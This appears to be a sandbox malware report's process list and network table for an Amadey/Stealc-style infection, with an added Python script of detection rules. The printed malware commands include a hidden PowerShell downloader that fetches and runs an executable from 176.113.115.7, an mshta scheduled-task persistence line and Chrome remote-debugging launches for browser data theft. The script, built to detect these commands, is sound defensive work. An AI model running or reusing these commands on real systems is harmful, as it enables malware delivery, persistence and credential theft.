C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "LW2TumadFO1" /tr "mshta \"C:\Temp\FhzKbqCT0.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\FhzKbqCT0.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2668 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2676 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe

"C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1212

C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe

"C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 608 -s 508

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778

C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe

"C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2216 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3748 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe

"C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"
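Three command-line patterns in the process list above are what a detection engineer would turn into rules: the scheduled task that runs mshta on a dropped .hta every 25 minutes, the hidden PowerShell downloader that fetches random.exe from 176.113.115.7 and starts it, and Chrome being relaunched with --remote-debugging-port (first 9229 with an empty profile directory, later 9223 with "Default" and "Guest Profile"). The Python below is an added example, not part of the sandbox report or of the malware, and the technique IDs are my mapping. It runs the three rules over command lines copied from the list plus constructed benign lines, pulls out the task name, download URL and drop path as IOCs, and reproduces the downloader's path concatenation: $env:temp has no trailing backslash, so the first variant, which appends the file name with no separator, writes the payload beside the Temp folder as ...\Local\Temp<name>.EXE (exactly the path the process list shows), while the later variant prepends a backslash and lands inside Temp. Renderer and utility children of Chrome inherit the debugging flag, so the rule only fires on the browser process, the one without --type=, which is the process the stealer actually spawned; that exclusion is a design choice of this example.

```python
"""Command-line detection rules for the Amadey/Stealc process tree (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: command lines copied from the process list above,
# followed by three benign lines (constructed) that the rules must not flag.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c schtasks /create /tn pWjUxmaAAtA /tr "mshta C:\Users\Admin\AppData\Local\Temp\k1LPaL4Kj.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'schtasks /create /tn "LW2TumadFO1" /tr "mshta \"C:\Temp\FhzKbqCT0.hta\"" /sc minute /mo 25 /ru "Admin" /f',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9229 --lang=en-US',
    # benign (constructed)
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --lang=en-US',
    r'schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /ru SYSTEM /f',
    r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"',
]

# (rule name, ATT&CK technique assumed by this example, pattern)
RULES = [
    # Persistence: a scheduled task whose action is mshta on an .hta file
    ("schtasks_mshta_hta", "T1053.005",
     re.compile(r'schtasks\s+/create\b.*?/tr\s+\\?"?mshta\b.*?\.hta', re.I)),
    # Ingress tool transfer: WebClient.DownloadFile from a URL, then Start-Process
    ("powershell_download_exec", "T1059.001/T1105",
     re.compile(r'powershell.*?DownloadFile\(\s*[\'"]https?://.*?Start-Process', re.I)),
    # Browser remote debugging on the browser process itself; the negative
    # lookahead skips --type= children, which merely inherit the flag
    ("chrome_remote_debugging", "T1185",
     re.compile(r'chrome\.exe"?(?!.*--type=).*--remote-debugging-port=(\d+)', re.I)),
]

URL_RE = re.compile(r'https?://[^\s\'"()]+', re.I)
TASK_RE = re.compile(r'/tn\s+"?([^\s"]+)', re.I)
DROP_RE = re.compile(r"\$env:temp\+'([^']*)'", re.I)


def resolve_drop_path(cmdline, temp=r'C:\Users\Admin\AppData\Local\Temp'):
    """Reproduce the PowerShell concatenation $env:temp+'<name>'.

    $env:temp carries no trailing backslash, so a name that does not start
    with one is glued onto the directory name (...\Local\Temp<name>).
    The sandbox user's Temp path is assumed here.
    """
    m = DROP_RE.search(cmdline)
    return temp + m.group(1) if m else None


@dataclass
class Finding:
    rule: str
    technique: str
    cmdline: str
    iocs: dict = field(default_factory=dict)


def scan(cmdline):
    """Return one Finding per rule that matches this command line."""
    findings = []
    for name, technique, rx in RULES:
        m = rx.search(cmdline)
        if not m:
            continue
        iocs = {}
        if name == "schtasks_mshta_hta":
            iocs["task"] = TASK_RE.search(cmdline).group(1)
        elif name == "powershell_download_exec":
            iocs["url"] = URL_RE.search(cmdline).group(0)
            iocs["drop"] = resolve_drop_path(cmdline)
        elif name == "chrome_remote_debugging":
            iocs["port"] = int(m.group(1))
        findings.append(Finding(name, technique, cmdline, iocs))
    return findings


def scan_all(cmdlines):
    """Flatten scan() over a list of command lines, preserving order."""
    return [f for c in cmdlines for f in scan(c)]


if __name__ == "__main__":
    for f in scan_all(SAMPLE_CMDLINES):
        print(f"{f.technique:16} {f.rule:26} {f.iocs}")
```

Run against the full Processes section of a report, the three rules fire only on the lines the malware itself produced; the renderer, crashpad and utility children, the benign scheduled task, and the random-name PowerShell one-liners from am_no.cmd stay quiet. The drop-path helper is what tells an incident responder to look for the first payload next to Temp rather than inside it.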

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2692 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2016 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe

"C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1200

C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe

"C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1064 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2176 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3784 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe

"C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

Network

Country Destination           Domain                        Proto
RU      185.215.113.16:80     185.215.113.14                tcp
RU      176.113.115.6:80      176.113.115.6                 tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
US      8.8.8.8:53            cobolrationumelawrtewarms.com udp
NL      107.189.27.66:80      cobolrationumelawrtewarms.com tcp
LU      45.59.120.8:80        45.59.120.8                   tcp
